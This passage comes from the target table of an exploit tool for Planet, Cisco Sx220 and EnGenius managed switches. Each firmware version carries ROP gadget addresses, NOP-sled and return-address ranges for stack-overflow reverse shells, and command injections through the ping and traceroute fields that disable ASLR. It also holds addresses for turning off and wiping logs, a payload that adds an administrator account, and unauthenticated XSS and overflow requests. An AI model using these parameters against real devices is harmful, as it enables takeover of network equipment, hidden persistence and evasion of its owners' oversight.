$ra'\t\t\t# Enable/Disable (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'cgi':'dispatcher.cgi',\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; main()\r\n\t\t\t\t\t\t'START':0x7ffeee04,\t\t\t\t# start: Stack overflow RA, used for searching NOP sled by blind jump\r\n\t\t\t\t\t\t'STOP':0x7fc60000,\t\t\t\t# end: You may want to play with this if you dont get it working\r\n\t\t\t\t\t\t'usr_nop': 64,\t\t\t\t\t# NOP sled (shellcode will be tailed)\r\n\t\t\t\t\t\t'pwd_nop': 45,\t\t\t\t\t# filler/garbage (not used for something constructive)\r\n\t\t\t\t\t\t'align': 3,\t\t\t\t\t\t# Align opcodes in memory\r\n\t\t\t\t\t\t'stack':True,\t\t\t\t\t# NOP and shellcode lays on: True = stack, False = Heap\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t},\r\n\t\t\t'218-7473': {\r\n\t\t\t\t'template':'Planet',\t\t\t\t\t# Static for the vendor\r\n\t\t\t\t'version':'2.0b160727',\t\t\t\t\t# Version / binary dependent stuff\r\n\t\t\t\t'model':'GS-4210-24T2S',\t\t\t\t# Model\r\n\t\t\t\t'uri':'https://www.planet.com.tw/en/product/GS-4210-24T2S',\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; embedparse() \r\n\t\t\t\t\t\t'gadget': 0x40E04C,\t\t\t\t# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'system': 0x8f99851c,\t\t\t# la $t9, system) # opcode, binary dependent\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'handler': 0x2484029c,\t\t\t# addiu $a0, (.ascii \"handler -c boa &\" - 0x430000) # (opcode, binary dependent)\r\n\t\t\t\t\t\t'v0': 7,\t\t\t\t\t\t# Should leave as-is (but you can play between 5 - 8)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_add_account': {\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_del_account': { #\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t# Ping IPv4\r\n\t\t\t\t\t\t'sys_ping_post_cmd':'ip=127.0.0.1 ; echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space > /tmp/check;&count=1',\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'web_sys_ping_post':0x424594,\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_ping_post()\r\n\r\n\t\t\t\t\t\t# traceroute\r\n\t\t\t\t\t\t#'sys_ping_post_cmd':'ip=127.0.0.1 ; echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space > /tmp/check;&tr_maxhop=30&count=1',\r\n\t\t\t\t\t\t#'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t#'web_sys_ping_post':0x424DF4,\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_trace_route_post()\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_log_setting_post()\r\n\t\t\t\t\t\t'log_settings_set':0x48AA98,\t# Jump one after 'sw $ra'\t\t\t# Disable Logging (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_log_file_del()\r\n\t\t\t\t\t\t'log_ramClear':0x48D9F4,\t\t# Jump one after 'sw $ra'\t\t\t# Clean RAM log (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_log_file_del()\r\n\t\t\t\t\t\t'log_fileClear':0x48D9F4,\t\t# Jump one after 'sw $ra'\t\t\t# Clean FILE log (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()\r\n\t\t\t\t\t\t'sys_timeSntp_set':0x42E474,\t# Jump one after 'sw $ra'\t\t\t# Set SNTP Server (Inject CMD)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_sntp_post()\r\n\t\t\t\t\t\t'sys_timeSntpDel_set':0x42E474,\t# Jump one after 'sw $ra'\t\t\t# Delete (address, binary dependent) \r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; web_sys_time_post()\r\n\t\t\t\t\t\t'sys_timeSettings_set':0x42D25c,# Jump one after 'sw $ra'\t\t\t# Enable/Disable (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'cgi':'dispatcher.cgi',\t\t\t# /sqfs/home/web/cgi-bin/dispatcher.cgi; main()\r\n\t\t\t\t\t\t'START':0x7ffeee04,\t\t\t\t# start: Stack overflow RA, used for searching NOP sled by blind jump\r\n\t\t\t\t\t\t'STOP':0x7fc60000,\t\t\t\t# end: You may want to play with this if you dont get it working\r\n\t\t\t\t\t\t'usr_nop': 64,\t\t\t\t\t# NOP sled (shellcode will be tailed)\r\n\t\t\t\t\t\t'pwd_nop': 45,\t\t\t\t\t# filler/garbage (not used for something constructive)\r\n\t\t\t\t\t\t'align': 3,\t\t\t\t\t\t# Align opcodes in memory\r\n\t\t\t\t\t\t'stack':True,\t\t\t\t\t# NOP and shellcode lays on: True = stack, False = Heap\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t#\r\n\t\t\t# Cisco Systems, Inc.\r\n\t\t\t# Sx220 Series\r\n\t\t\t#\r\n\t\t\t# CGI Reverse Shell : Yes\r\n\t\t\t# Boa/Hydra reverse shell: Yes\r\n\t\t\t# Del /var/log/ram.log : Yes\r\n\t\t\t# Del /var/log/flash.log : Yes\r\n\t\t\t# Del /mntlog/flash.log : Yes\r\n\t\t\t# Add credentials : Yes\r\n\t\t\t# Del credentials : Yes\r\n\t\t\t#\r\n\t\t\t'225-51973': {\r\n\t\t\t\t'template':'Cisco',\t\t\t\t\t\t# Static for the vendor\r\n\t\t\t\t'version':'1.1.3.1',\t\t\t\t\t# Version / binary dependent stuff\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; embedparse() \r\n\t\t\t\t\t\t'gadget': 0x40F70C,\t\t\t\t# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'system': 0x8f998524,\t\t\t# la $t9, system # opcode, binary dependent\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'handler': 0x2484683c,\t\t\t# addiu $a0, (.ascii \"handler -c boa &\" - 0x430000) # (opcode, binary dependent)\r\n\t\t\t\t\t\t'v0': 7,\t\t\t\t\t\t# Should leave as-is (but you can play between 5 - 8)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_add_account': {\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_del_account': { #\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_ping_set()\r\n\t\t\t\t\t\t# Ping IPv4\r\n\t\t\t\t\t\t'web_sys_ping_post':0x43535C,\t# Jump one after 'sw $ra'\t\t\t# (address, binary dependent)\r\n\t\t\t\t\t\t'sys_ping_post_cmd':'&srvHost=127.0.0.1 \";echo 0 > /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space > /tmp/check;\"&count=1',\r\n\t\t\t\t\t\t'sys_ping_post_check':'',\r\n\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_tracert_set()\r\n\t\t\t\t\t\t# traceroute\r\n\t\t\t\t\t\t#'web_sys_ping_post':0x43567C,\t# Jump one after 'sw $ra'\t\t\t# (address, binary dependent)\r\n\t\t\t\t\t\t#'sys_ping_post_cmd':'&srvHost=127.0.0.1 \";echo 0 > /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space > /tmp/check;\"&count=1',\r\n\t\t\t\t\t\t#'sys_ping_post_check':'',\r\n\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\t\t\t\t# \r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_log_settings_set()\r\n\t\t\t\t\t\t'log_settings_set':0x436FDC,\t# Jump one after 'sw $ra'\t\t\t# Disable Logging (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_log_ramClear_set()\r\n\t\t\t\t\t\t'log_ramClear':0x436F34,\t\t# Jump one after 'sw $ra'\t\t\t# Clean RAM log (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_log_fileClear_set()\r\n\t\t\t\t\t\t'log_fileClear':0x436F88,\t\t# Jump one after 'sw $ra'\t\t\t# Clean FILE log (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSntp_set()\r\n\t\t\t\t\t\t'sys_timeSntp_set':0x434FB0,\t# Jump one after 'sw $ra'\t\t\t# Set SNTP Server (Inject RCE)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSntpDel_set()\r\n\t\t\t\t\t\t'sys_timeSntpDel_set':0x4350D8,\t# Jump one after 'sw $ra'\t\t\t# Delete (address, binary dependent) \r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSettings_set()\r\n\t\t\t\t\t\t'sys_timeSettings_set':0x434140,# Jump one after 'sw $ra'\t\t\t# Enable/Disable (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'cgi':'set.cgi',\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_home_loginAuth_set()\r\n\t\t\t\t\t\t'START':0x7ffeff04,\t\t\t\t# start: Stack overflow RA, used for searching NOP sled by blind jump\r\n\t\t\t\t\t\t'STOP':0x7fc60000,\t\t\t\t# end: You may want to play with this if you dont get it working\r\n\t\t\t\t\t\t'usr_nop': 64,\t\t\t\t\t# NOP sled (shellcode will be tailed)\r\n\t\t\t\t\t\t'pwd_nop': 77,\t\t\t\t\t# filler/garbage (not used for something constructive)\r\n\t\t\t\t\t\t'align': 3,\t\t\t\t\t\t# Align opcodes in memory\r\n\t\t\t\t\t\t'stack':True,\t\t\t\t\t# NOP and shellcode lays on: True = stack, False = Heap\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t},\r\n\t\t\t'225-60080': {\r\n\t\t\t\t'template':'Cisco',\t\t\t\t\t\t# Static for the vendor\r\n\t\t\t\t'version':'1.1.4.1',\t\t\t\t\t# Version / binary dependent stuff\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; embedparse() \r\n\t\t\t\t\t\t'gadget': 0x40ffac,\t\t\t\t# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'system': 0x8f998530,\t\t\t# la $t9, system # opcode, binary dependent\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'handler': 0x24847b6c,\t\t\t# addiu $a0, (.ascii \"handler -c boa &\" - 0x430000) # (opcode, binary dependent)\r\n\t\t\t\t\t\t'v0': 7,\t\t\t\t\t\t# Should leave as-is (but you can play between 5 - 8)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_add_account': {\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_del_account': { #\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_ping_set()\r\n\t\t\t\t\t\t# Ping IPv4\r\n\t\t\t\t\t\t'web_sys_ping_post':0x43535C,\t# Jump one after 'sw $ra'\t\t\t# (address, binary dependent)\r\n\t\t\t\t\t\t'sys_ping_post_cmd':'&srvHost=127.0.0.1 \";echo 0 > /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space > /tmp/check;\"&count=1',\r\n\t\t\t\t\t\t'sys_ping_post_check':'',\r\n\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_tracert_set()\r\n\t\t\t\t\t\t# traceroute\r\n\t\t\t\t\t\t#'web_sys_ping_post':0x43567C,\t# Jump one after 'sw $ra'\t\t\t# (address, binary dependent)\r\n\t\t\t\t\t\t#'sys_ping_post_cmd':'&srvHost=127.0.0.1 \";echo 0 > /proc/sys/kernel/randomize_va_space;cat /proc/sys/kernel/randomize_va_space > /tmp/check;\"&count=1',\r\n\t\t\t\t\t\t#'sys_ping_post_check':'',\r\n\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\t\t\t\t# \r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_log_settings_set()\r\n\t\t\t\t\t\t'log_settings_set':0x436FDC,\t# Jump one after 'sw $ra'\t\t\t# Disable Logging (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_log_ramClear_set()\r\n\t\t\t\t\t\t'log_ramClear':0x436F34,\t\t# Jump one after 'sw $ra'\t\t\t# Clean RAM log (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_log_fileClear_set()\r\n\t\t\t\t\t\t'log_fileClear':0x436F88,\t\t# Jump one after 'sw $ra'\t\t\t# Clean FILE log (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSntp_set()\r\n\t\t\t\t\t\t'sys_timeSntp_set':0x434FB0,\t# Jump one after 'sw $ra'\t\t\t# Set SNTP Server (Inject RCE)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSntpDel_set()\r\n\t\t\t\t\t\t'sys_timeSntpDel_set':0x4350D8,\t# Jump one after 'sw $ra'\t\t\t# Delete (address, binary dependent) \r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSettings_set()\r\n\t\t\t\t\t\t'sys_timeSettings_set':0x434140,# Jump one after 'sw $ra'\t\t\t# Enable/Disable (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'cgi':'set.cgi',\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_home_loginAuth_set()\r\n\t\t\t\t\t\t'START':0x7ffeff04,\t\t\t\t# start: Stack overflow RA, used for searching NOP sled by blind jump\r\n\t\t\t\t\t\t'STOP':0x7fc60000,\t\t\t\t# end: You may want to play with this if you dont get it working\r\n\t\t\t\t\t\t'usr_nop': 64,\t\t\t\t\t# NOP sled (shellcode will be tailed)\r\n\t\t\t\t\t\t'pwd_nop': 77,\t\t\t\t\t# filler/garbage (not used for something constructive)\r\n\t\t\t\t\t\t'align': 3,\t\t\t\t\t\t# Align opcodes in memory\r\n\t\t\t\t\t\t'stack':True,\t\t\t\t\t# NOP and shellcode lays on: True = stack, False = Heap\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t#\r\n\t\t\t# EnGenius Technologies, Inc.\r\n\t\t\t# EGS series\r\n\t\t\t#\r\n\t\t\t# CGI Reverse Shell : Yes\r\n\t\t\t# Boa/Hydra reverse shell: Yes\r\n\t\t\t# Del /var/log/ram.log : Yes\r\n\t\t\t# Del /var/log/flash.log : Yes\r\n\t\t\t# Del /mntlog/flash.log : Yes\r\n\t\t\t# Add credentials : Yes\r\n\t\t\t# Del credentials : Yes\r\n\t\t\t#\r\n\t\t\t'14044-509': {\r\n\t\t\t\t'template':'EnGenius',\t\t\t\t\t\t# Static for the vendor\r\n\t\t\t\t'version':'1.05.20_150810-1754',\t\t\t\t\t# Version / binary dependent stuff\r\n\t\t\t\t'model':'EGS2110P',\t\t\t\t# Model\r\n\t\t\t\t'uri':'https://www.engeniustech.com/engenius-products/8-port-gigabit-smart-switch-egs2110p/',\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; embedparse() \r\n\t\t\t\t\t\t'gadget': 0x40E12C,\t\t\t\t# Gadget: 'addu $v0,$gp ; jr $v0' (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'system': 0x8f99851c,\t\t\t# la $t9, system # opcode, binary dependent\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/bin/boa; read_body(); \r\n\t\t\t\t\t\t'handler': 0x248405a0,\t\t\t# addiu $a0, (.ascii \"handler -c boa &\" - 0x430000) # (opcode, binary dependent)\r\n\t\t\t\t\t\t'v0': 7,\t\t\t\t\t\t# Should leave as-is (but you can play between 5 - 8)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/datajson.cgi; sn_tracertSet()\r\n\t\t\t\t\t\t# traceroute\r\n\t\t\t\t\t\t'web_sys_ping_post': 0x42382C,\t# Jump one after 'sw $ra'\t\t\t# (address, binary dependent)\r\n\t\t\t\t\t\t'sys_ping_post_cmd':'&ip=127.0.0.1 ;echo 0 > /proc/sys/kernel/randomize_va_space; cat /proc/sys/kernel/randomize_va_space > /tmp/conf_tmp/check #&mh=30&uid=0',\r\n\t\t\t\t\t\t'sys_ping_post_check':'',\r\n\t\t\t\t\t\t'verify_uri':'/conf_tmp/check',\r\n\r\n\t\t\t\t\t\t'vulnerable': True,\t\t\t\t# \r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_add_account': {\r\n\t\t\t\t\t\t# pt: 0 = no password, 1 = cleartext, 2 = encrypted\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; sn_user_mngSet()\r\n\t\t\t\t\t\t'address':0x423E74,\t\t\t\t# Jump one after 'sw $ra'\t\t\t# (address, binary dependent)\r\n\t\t\t\t\t\t'account':'&na=USERNAME&pt=2&pw=PASSWORD&pwn=PASSWORD&pv=0&op=1&',\t\t\t# Admin, priv 15\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_del_account': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; sn_user_mngSet()\r\n\t\t\t\t\t\t'address':0x423E74,\t\t\t\t# Jump one after 'sw $ra'\t\t\t# (address, binary dependent)\r\n\t\t\t\t\t\t'account':'&na=USERNAME&pt=2&pv=0&op=0',\t\t# \r\n\t\t\t\t\t\t'vulnerable': True,\t\t\t\t# \r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_globalSet()\r\n\t\t\t\t\t\t'log_settings_set':0x43DE18,\t# Jump one after 'sw $ra'\t\t\t# Disable Logging (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()\r\n\t\t\t\t\t\t'log_ramClear':0x43F934,\t\t# Jump one after 'sw $ra'\t\t\t# Clean RAM log (address, binary dependent)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/datajson.cgi; sn_log_show_Set()\r\n\t\t\t\t\t\t'log_fileClear':0x43F934,\t\t# Jump one after 'sw $ra'\t\t\t# Clean FILE log (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi-bin/datajson.cgi; sn_sys_timeSet()\r\n\t\t\t\t\t\t'sys_timeSntp_set':0x424844,\t# Jump one after 'sw $ra'\t\t\t# Set SNTP Server (Inject RCE)\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSntpDel_set()\r\n\t\t\t\t\t\t'sys_timeSntpDel_set':0x424844,\t# Jump one after 'sw $ra'\t\t\t# Delete (address, binary dependent) \r\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t# /sqfs/home/web/cgi/set.cgi; cgi_sys_timeSettings_set()\r\n\t\t\t\t\t\t'sys_timeSettings_set':0x424844,# Jump one after 'sw $ra'\t\t\t# Enable/Disable (address, binary dependent)\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'cgi':'security.cgi',\t\t\t# /sqfs/home/web/cgi-bin/security.cgi; main()\r\n\t\t\t\t\t\t'START':0x100181A0,\t\t\t\t# start: Stack overflow RA, used for searching NOP sled by blind jump\r\n\t\t\t\t\t\t'STOP':0x104006A0,\t\t\t\t# end: You may want to play with this if you dont get it working\r\n\t\t\t\t\t\t'usr_nop': 987,\t\t\t\t\t# NOP sled (shellcode will be tailed)\r\n\t\t\t\t\t\t'pwd_nop': 69,\t\t\t\t\t# filler/garbage (not used for something constructive)\r\n\t\t\t\t\t\t'align': 0,\t\t\t\t\t\t# Align opcodes in memory\r\n\t\t\t\t\t\t'stack':False,\t\t\t\t\t# NOP and shellcode lays on: True = stack, False = Heap\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t#\r\n\t\t\t# EnGenius Technologies, Inc.\r\n\t\t\t# EWS series\r\n\t\t\t#\r\n\t\t\t# CGI Reverse Shell : Yes\r\n\t\t\t# Boa/Hydra reverse shell: Yes\r\n\t\t\t# Del /var/log/ram.log : Yes\r\n\t\t\t# Del /var/log/flash.log : Yes\r\n\t\t\t# Del /mntlog/flash.log : Yes\r\n\t\t\t# Add credentials : Yes\r\n\t\t\t# Del credentials : Yes\r\n\t\t\t#\r\n\t\t\t'14044-32589': {\r\n\t\t\t\t'template':'EnGenius',\t\t\t\t\t\t# Static for the vendor\r\n\t\t\t\t'version':'1.06.21_c1.8.77_180906-0716',\t\t\t\t\t# Version / binary dependent stuff\r\n\t\t\t\t'model':'EWS1200-28TFP',\t\t\t\t# Model\r\n\t\t\t\t'uri':'https://www.engeniustech.com/engenius-products/managed-poe-network-switch-ews1200-28tfp/',\r\n\t\t\t\t'verify': { \r\n\t\t\t\t\t\t'cpl_locallogin.cgi (XSS)': {\r\n\t\t\t\t\t\t\t'description':'XSS in \"redirecturl,userurl,loginurl,username,password\" (PoC: Count passed XSS)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'xss',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/cpl_locallogin.cgi?redirecturl=<script>alert(XSS);</script>&userurl=<script>alert(XSS);</script>&loginurl=<script>alert(XSS);</script>',\r\n\t\t\t\t\t\t\t'content':'username=<script>alert(XSS);</script>&password=<script>alert(XSS);</script>',\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'sn.captivePortal.login (XSS)': {\r\n\t\t\t\t\t\t\t'description':'XSS in \"userurl & uamip\" (PoC: Count passed XSS)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'xss',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/sn.captivePortal.login?cmd=action',\r\n\t\t\t\t\t\t\t'content':'mac=dummy&res=dummy&userurl=<script>alert(XSS);</script>&uamip=<script>alert(XSS);</script>&alertmsg=dummy&called=dummy',\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'cpl_logo_ul.cgi': {\r\n\t\t\t\t\t\t\t'description':'Unauthenticated upload of \"logo_icon\". (PoC: Upload invalid file)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'json',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/cpl_logo_ul.cgi',\r\n\t\t\t\t\t\t\t'content':'Content-Disposition: filename.png\\n------',\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'cpl_locallogin.cgi': {\r\n\t\t\t\t\t\t\t'description':'Stack overflow in \"username/password (PoC: crash CGI)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'502',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/cpl_locallogin.cgi?redirecturl=AAAA&userurl=BBBB&loginurl=BBBB',\r\n\t\t\t\t\t\t\t'content':'username=admin&password=' + self.random_string(196),\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'sn.captivePortal.login': {\r\n\t\t\t\t\t\t\t'description':'Stack overflow in \"called\", XSS in \"userurl & uamip\" (PoC: crash CGI)',\r\n\t\t\t\t\t\t\t'authenticated': 